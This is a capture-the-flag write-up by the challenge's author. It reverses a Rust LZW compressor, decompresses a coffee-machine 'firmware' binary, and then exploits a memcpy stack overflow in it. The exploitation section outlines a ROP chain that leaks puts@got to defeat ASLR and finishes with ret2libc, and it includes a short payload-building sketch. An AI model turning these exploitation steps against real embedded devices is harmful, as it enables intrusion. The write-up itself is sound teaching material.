Problem

Our coworker just bought an IoT coffee machine that lets him start the brewing process from his computer. Hacking it and messing with his coffee seems like a fun prank. We were able to extract the compressed firmware and the encoder/compressor. Can you retrieve the original firmware and write an exploit for it? I'm sure it's vulnerable. It probably doesn't even have stack protectors or PIE. According to the manufacturer's website the md5sum of the original firmware is: 4f3b072e43086f1253f90f7fc366cfb2

challenge_files

Solution

This is one of the challenges I authored for UMassCTF 2022. I recently worked on some security research pertaining to embedded devices, so I figured it'd be fun to replicate some of those aspects in a CTF challenge.

We are given two files: an unrecognizable binary blob named 'chal_compressed', which according to the challenge description most likely represents the compressed firmware, and an ELF binary called compressor, which was presumably used to compress the firmware.

Binwalk unfortunately does not recognize anything within this binary blob; we can, however, use it to display the entropy graph shown below. The even, low entropy distribution confirms that we are dealing with compression. We could try analyzing the compressed data a bit more and e.g. attempt to find some strings in it that were skipped during compression, but at this point it is probably more valuable to focus on the given compressor binary instead.



The first "challenge" here is that the compressing algorithm is implemented in rust, which can often be a lot more challenging to reverse engineer than c. With some light initial reverse engineering we can figure out that the binary has 2 custom functions alongside all of the extra procedures added by the compiler. We only care about these 2 functions, main & compress.

The main function is fairly straightforward: it calls std::fs::read("./chal") to read in the binary before passing the buffer to the compress() function, which returns the compressed data. This data is then passed to slice::from_raw_parts(), which in this case just reinterprets the Vec<u32> returned from compress() as an 8-bit array before it is written out to the './chal_compressed' file.

Based on this initial analysis, it seems like the main() function is just a small wrapper in charge of reading/writing the data to disk, while the compress() function handles the actual compression logic.

The actual Rust code for the main function from the challenge is posted below.

use std::{mem, slice};

fn main() {
    let target = std::fs::read("./chal").unwrap();

    let compressed = compress(&target);
    // We can only write byte slices to files using std::fs::write, so we need to view
    // the Vec<u32> as an 8-bit array first. This reinterprets the buffer in place.
    let compressed_u8: &[u8] = unsafe {
        slice::from_raw_parts(
            compressed.as_ptr() as *const u8,
            compressed.len() * mem::size_of::<u32>(),
        )
    };
    std::fs::write("./chal_compressed", compressed_u8).unwrap();
}



Before diving into the code for the compress() function, let's talk a little about compression algorithms in general. The purpose of compression algorithms is to reduce the size of data. In some cases (e.g. images/videos), this compression can be lossy, meaning some data is lost upon decompression. In the case of executable data, however, every single opcode has to be correct after decompression, so we need a lossless algorithm.

Since the challenge hints that the underlying data is a firmware image, we can work under the assumption that we are dealing with a lossless compression algorithm. There are several common lossless compression approaches. Some more naive implementations such as RLE (run-length encoding) simply iterate through the data and replace runs of identical characters with n*c in the compressed data, where n represents the repeat count and c the character itself. This means that 'ABBBBBBBBBCDEEEEF' would result in 'A9*BCD4*EF'. The advantage is that this compression algorithm is very simple to implement, but it only works well with files that contain a lot of repetitive data.
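To make the idea concrete, here is a minimal run-length encoder of my own that emits (count, byte) pairs instead of the textual n*c form above; it has nothing to do with the challenge code:

fn rle_compress(data: &[u8]) -> Vec<(u8, u8)> {
    let mut out = Vec::new();
    if data.is_empty() {
        return out;
    }
    let (mut cur, mut count) = (data[0], 1u8);
    for &b in &data[1..] {
        if b == cur && count < u8::MAX {
            // Still inside the current run.
            count += 1;
        } else {
            // The run ended: emit (count, byte) and start a new run.
            out.push((count, cur));
            cur = b;
            count = 1;
        }
    }
    out.push((count, cur));
    out
}

Running it over the example string yields [(1, 'A'), (9, 'B'), (1, 'C'), (1, 'D'), (4, 'E'), (1, 'F')].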

Other compression algorithms first analyze the entire input in an initial pass to build a tree that maps frequently occurring symbols to shorter encoded counterparts. On a second pass, they then replace parts of the data with these shorter codes, thus compressing it. This technique is used in the Huffman coding algorithm. Some of its pitfalls are that it requires two passes over the data, which makes it slightly less efficient, and that the generated tree is required to decompress the data again, which makes the algorithm impractical on its own for many use cases.
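To make that first, analysis pass concrete, here is a small sketch of my own (not code from the challenge) that derives per-symbol Huffman code lengths by repeatedly merging the two least frequent subtrees; assigning the actual bit patterns and serializing the tree are left out:

use std::cmp::Reverse;
use std::collections::BinaryHeap;

fn huffman_code_lengths(data: &[u8]) -> [u8; 256] {
    // First pass: count how often each byte occurs.
    let mut freq = [0u64; 256];
    for &b in data {
        freq[b as usize] += 1;
    }

    // Min-heap of (frequency, symbols in this subtree), smallest frequency first.
    let mut heap: BinaryHeap<Reverse<(u64, Vec<u8>)>> = freq
        .iter()
        .enumerate()
        .filter(|&(_, &f)| f > 0)
        .map(|(sym, &f)| Reverse((f, vec![sym as u8])))
        .collect();

    // Repeatedly merge the two least frequent subtrees; every symbol inside a
    // merged subtree ends up one bit deeper in the final tree.
    let mut lengths = [0u8; 256];
    while heap.len() > 1 {
        let Reverse((freq_a, syms_a)) = heap.pop().unwrap();
        let Reverse((freq_b, syms_b)) = heap.pop().unwrap();
        let mut merged = syms_a;
        merged.extend_from_slice(&syms_b);
        for &sym in &merged {
            lengths[sym as usize] += 1;
        }
        heap.push(Reverse((freq_a + freq_b, merged)));
    }
    lengths
}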

With these two relatively simple algorithms out of the way, we now get to the LZ family of compression algorithms, which is the most relevant to the compression found in this challenge. LZ compression started in 1977 with LZ77, and over the years many different iterations were developed. Many of them have since vanished from common use, but some variants such as DEFLATE, which combines LZ77 & Huffman coding, are still widely used. DEFLATE specifically is used for zip/gzip archives, PNG images, and many more common file formats you have probably heard of. While LZ algorithms aren't known for optimal compression ratios, they still compress reasonably well while offering extremely high performance for both compression and decompression, which is very important for many applications.

Image Source: https://ethw.org/History_of_Lossless_Data_Compression_Algorithms



For this challenge specifically, we will focus on LZW compression. LZW is still commonly used in GIFs but has otherwise mostly been replaced by more modern algorithms. It is still a very interesting algorithm to explore because it forms the basis for many of the more modern algorithms we frequently see today. LZW is another dictionary-based compression algorithm similar to Huffman coding, except that it builds its dictionary iteratively while scanning through the data and making replacements immediately. This means that it only needs a single pass over the data. Another advantage is that the dictionary is built up in a way that allows the decompressor to reconstruct it from the compressed data alone, so the encoding map can be discarded after compression and does not need to be passed on to the decompression routine.

LZW replaces sequences of characters with single codes without doing any initial analysis of the data. This means that it often starts out inefficient on the first few hundred bytes, but gets better and better as it expands the dictionary with longer repeated sequences. Typically every byte is stored using 8 bits, allowing up to 256 unique symbols to represent a single unit of data. LZW extends this mapping to more bits so that more than 256 unique symbols can be stored at a time. Typically 9-12 bits are used, depending on the size and structure of the data, but for the purposes of this challenge I used 32 bits, which, while laughably wasteful, slightly reduces the complexity of the code while still demonstrating the same principles, which I believe is good for a CTF challenge.

The first 256 codes are reserved for bytes 0x00-0xff, so every possible single byte already has a code and the algorithm does not have to learn them one by one. While iterating through the data, whenever a new sequence of bytes is encountered, an entry is added to the dictionary. Whenever this sequence of bytes is found again later, it is simply replaced with that entry, which, while inefficient for single 1-byte characters (since they are now stored in more than 8 bits), greatly reduces the size when dealing with longer repeated data sequences.

The below example showcases how this might look given a small sample dictionary and input.
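To supplement it, here is a small hand-worked trace of my own on the toy input "ABABABA" (not the example from the original figure):

    emit 65  ('A'),   add "AB"  as code 256   (tracker "A",  next byte 'B')
    emit 66  ('B'),   add "BA"  as code 257   (tracker "B",  next byte 'A')
    (tracker "A" grows to "AB", which already exists as code 256)
    emit 256 ("AB"),  add "ABA" as code 258   (tracker "AB", next byte 'A')
    (tracker "A" grows to "AB" and then "ABA", both of which are already known)
    emit 258 ("ABA")                          (end of input)

The 7-byte input therefore compresses to the four 32-bit codes [65, 66, 256, 258].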



Ok, now that we have covered the basics of various compression algorithms, let's take another look at the challenge. We start by allocating a hashmap that is used as a dictionary to keep track of the codes and initialize the first 256 entries with 0x00-0xff. Next, we start looping through the given data. On each iteration we append the current byte to the symbol we are currently tracking and check if the result already exists in our codebook. If it does, we keep the extended symbol and move on to the next byte to try to find an even longer match. Once the current byte deviates from our codebook entries, we append the code of the longest match we found to the compressed data and insert the newly created sequence into the dictionary. Then we reset the tracker and repeat this process for the next symbol in the data. This means that if we encounter the same sequence again in the future, it will already exist in the codebook, so we can compress it. Like this we gradually build up a dictionary of symbols commonly present in the data, improving the compression as we go along.

While this method is certainly not as optimal as other compression methods that make use of heavy statistical analysis to achieve better compression ratios, it is extremely fast and can be implemented in a very small amount of code, making it useful for low-resource devices or applications that greatly benefit from a fast algorithm.

The actual code of the compression function is listed below. During the actual challenge you would have had to reverse engineer this from the binary.

// FxHashMap is provided by an external crate (e.g. rustc-hash or fxhash); std's
// HashMap would work here just as well.
use rustc_hash::FxHashMap;

fn compress(data: &[u8]) -> Vec<u32> {
    // Initialize a codebook that maps a byte sequence to a short index that can be used to
    // replace the byte sequence and thus compress the data. This is initialized with single
    // character strings at the beginning.
    let mut code_book: FxHashMap<Vec<u8>, u32> = FxHashMap::default();
    for i in 0..=255 {
        code_book.insert(vec![i], i as u32);
    }

    let mut tracker = vec![data[0]];
    let mut compressed = Vec::new();

    for &b in &data[1..] {
        let mut cur = tracker.clone();
        cur.push(b);

        // Check if the code book contains tracker + the current byte; if so, extend the
        // tracker with the current byte and keep growing the combination
        if code_book.contains_key(&cur) {
            tracker.push(b);
        } else {
            // In this case we found a new entry that we can now add to the compressed data
            compressed.push(code_book[&tracker]);

            // Since this is a new entry, we insert this entry into the code book before resetting
            // the tracker
            code_book.insert(cur, code_book.len() as u32);
            tracker.clear();
            tracker.push(b);
        }
    }

    // If the final entry in the file was in the dictionary, we still need to push it to the 
    // compressed data at this point
    if !tracker.is_empty() {
        compressed.push(code_book[&tracker]);
    }

    compressed
}



With the compression out of the way, let's take a look at how the decompression works. Once again we start by allocating a hashmap and filling it up with the initial 0x00-0xff codes. This time the hashmap maps code->symbol, unlike the compression function, which mapped symbol->code. Then we start iterating through the compressed data, which at this point, due to the previous LZW compression, consists entirely of codes. If the code we are currently on exists in the dictionary, we just add the dictionary entry to the decompressed data. Since the decompression is always one step behind the compression, there is also the case where the code we are looking at does not yet exist in the dictionary. This is not a big deal though: because we are only one step behind, the missing entry can only be the previous entry extended by its own first byte, so the decompressor can reconstruct it on the spot and keep advancing.

While slightly more complicated than the compression itself, it is still a relatively simple algorithm overall that results in very fast decompression, which even the smallest processors can handle for moderately sized data.

My sample solution for the decompression algorithm is listed below, although there are many different ways this could have been implemented.

fn decompress(data: &[u32]) -> Option<Vec<u8>> {
    // Initialize a codebook that maps an index to its corresponding byte sequence. This is used to
    // gradually build up a decoder while parsing the message and obtaining additional information. 
    // It is initialized with single character strings at the beginning.
    let mut code_book: FxHashMap<u32, Vec<u8>> = FxHashMap::default();
    for i in 0..=255 {
        code_book.insert(i, vec![i as u8]);
    }

    let mut tracker = code_book.get_mut(&data[0])?.to_vec();
    let mut decompressed = tracker.clone();

    for &b in &data[1..] {
        let entry = if code_book.contains_key(&b) {
            code_book[&b].clone()
        } else if b == code_book.len() as u32 {
            let mut e = tracker.clone();
            e.push(tracker[0]);
            e
        } else {
            return None;
        };

        decompressed.extend_from_slice(&entry);

        tracker.push(entry[0]);
        code_book.insert(code_book.len() as u32, tracker);

        tracker = entry;
    }
    Some(decompressed)
}
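A quick way to gain confidence in the solution is to round-trip some data through both functions. The small harness below is my own test driver (not part of the challenge files); it checks the toy example from earlier and then decompresses the actual blob, assuming the compressor ran on a little-endian machine:

fn main() {
    // Toy input from the worked example above: "ABABABA" compresses to
    // [65, 66, 256, 258] and must decompress back to the original bytes.
    let data = b"ABABABA".to_vec();
    let compressed = compress(&data);
    assert_eq!(compressed, vec![65, 66, 256, 258]);
    assert_eq!(decompress(&compressed), Some(data));

    // The real target: reinterpret the blob as u32 codes and decompress it. The
    // md5sum of the output should match the one from the challenge description.
    let blob = std::fs::read("./chal_compressed").unwrap();
    let codes: Vec<u32> = blob
        .chunks_exact(4)
        .map(|c| u32::from_le_bytes([c[0], c[1], c[2], c[3]]))
        .collect();
    let firmware = decompress(&codes).expect("decompression failed");
    std::fs::write("./chal", firmware).unwrap();
}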



At this point, you should be able to extract the actual "firmware" and begin the exploitation process. Initially, this challenge spun up a small server and communicated over sockets to better fit the challenge's theme. This unfortunately caused issues with hosting the challenge, so I ended up just reading/writing to stdin instead.

Let's start by looking at the main function. The binary was not stripped, so function names remain, making our reverse engineering process a little easier. The main function appears to read in two packets. It performs a check on both the first and the second packet before performing some action based on an action variable that is most likely set by one of the packets.



Next, we can look at the verify_initial_packet() function that takes care of verifying the validity of the first packet. With some light reverse engineering, we can determine the structure this packet expects and define it in binja.

At this point, this part of the challenge becomes almost trivial. The function verifies some magic bytes, sets the 'Action' variable based on the packet, and then verifies that the base64-decoded version of the given key is equal to the hardcoded password "password".
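For illustration, the verification logic boils down to something like the sketch below. This is my own Rust rendering of the decompiled logic; the magic constant, the parameter types, and the use of the base64 crate are placeholders rather than the firmware's real definitions:

fn verify_initial_packet(magic: u32, action_field: u32, key_b64: &str) -> Option<u32> {
    // Placeholder value, not the real magic from the firmware.
    const EXPECTED_MAGIC: u32 = 0xdead_beef;

    if magic != EXPECTED_MAGIC {
        return None;
    }
    // The firmware base64-decodes the supplied key and compares it against the
    // hardcoded password. The base64 crate stands in for whatever decoder it uses.
    let decoded = base64::decode(key_b64).ok()?;
    if decoded != b"password".to_vec() {
        return None;
    }
    // On success, the packet's action field decides which path main() takes next.
    Some(action_field)
}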



We can now do the same for the checksum verification on packet_2. We once again define a structure based on the packet layout (I have taken the liberty of filling out some fields that we do not know yet, but that will become obvious with further reverse engineering). This function loops through the data portion of the given packet according to the provided length and sums it up. The result is then checked against the provided checksum.

There is an out-of-bounds bug here, since the provided length is trusted without any validation; however, it is not exploitable in this case and would just lead to a crash.
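In Rust-like pseudocode the reversed checksum routine looks roughly like the sketch below; the struct layout, field names, and buffer size are my own guesses rather than the firmware's real definitions:

#[repr(C)]
struct Packet2 {
    length: u32,      // attacker-controlled length of the data field
    checksum: u32,    // expected sum of the data bytes
    data: [u8; 256],  // payload buffer (size assumed for illustration)
}

fn verify_checksum(pkt: &Packet2) -> bool {
    let mut sum: u32 = 0;
    // The provided length is trusted as-is. In the original C code an oversized
    // length walks past the end of the buffer; in this Rust sketch it would
    // simply panic on the bounds check.
    for i in 0..pkt.length as usize {
        sum = sum.wrapping_add(pkt.data[i] as u32);
    }
    sum == pkt.checksum
}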



Looking back at the main function, all actions except '2' lead to exit paths, so let's focus on the path taken when action is set to 2 and look at the make_coffee() function.

The function itself is pretty long; however, there are only a couple of interesting parts. At the very beginning, it checks that the temperature has a sensible value. If so, it proceeds to set a string that appears to list your chosen cup size. After a memcpy() using the provided data/length, another if statement is used to determine the type of coffee requested before printing out the completed message to the user.

At this point we have all the required information to start interacting with the binary. We can send it some valid packets and begin talking to the coffee machine.



Earlier I briefly mentioned the memcpy(). It copies our provided data to a stack location using the length we supply, which looks like a textbook buffer overflow. The challenge description hints that the binary has neither PIE nor stack protectors enabled, resulting in a relatively straightforward solution using return-oriented programming.

We start by sending an initial payload that calls puts@plt with puts@got as its argument to leak a libc address and defeat ASLR, before returning back to main. Next, we retrigger the same bug to cause another overflow, this time with libc gadgets at our disposal, and finish with a simple ret2libc attack.
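For illustration, the first-stage chain could be assembled as shown below. Every offset and address here is a placeholder; the real values have to come from your own reverse engineering of the extracted firmware and its libc:

fn build_stage1() -> Vec<u8> {
    const PADDING: usize = 72;          // bytes until the saved return address (assumed)
    const POP_RDI_RET: u64 = 0x401234;  // 'pop rdi; ret' gadget (assumed)
    const PUTS_PLT: u64 = 0x401050;     // puts@plt (assumed)
    const PUTS_GOT: u64 = 0x404018;     // puts@got (assumed)
    const MAIN: u64 = 0x401100;         // address of main (assumed)

    // pop rdi; ret -> rdi = &puts@got, then puts(puts@got) leaks a libc address,
    // and finally execution returns to main so we can send the second payload.
    let mut payload = vec![b'A'; PADDING];
    for value in [POP_RDI_RET, PUTS_GOT, PUTS_PLT, MAIN] {
        payload.extend_from_slice(&value.to_le_bytes());
    }
    payload
}

The resulting bytes go into the data field of packet 2 (with the length and checksum fields adjusted to match) before being sent over stdin.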

If you are interested in the specifics of this attack, check out one of my previous writeups here: https://seal9055.com/ctf-writeups/cyber_apocalypse/controller

While this "firmware" image seemed almost too easy to break, this is the unfortunate reality of embedded security. Obvious mistakes such as printf() format string vulnerabilities or strcpy() buffer overflows occur much more frequently than you would think. A recent CVE I got for example, was due to a printf() format string bug in a popular embedded camera from a US-based company. I will be releasing a writeup on that soon too once the company has finished fixing the bugs.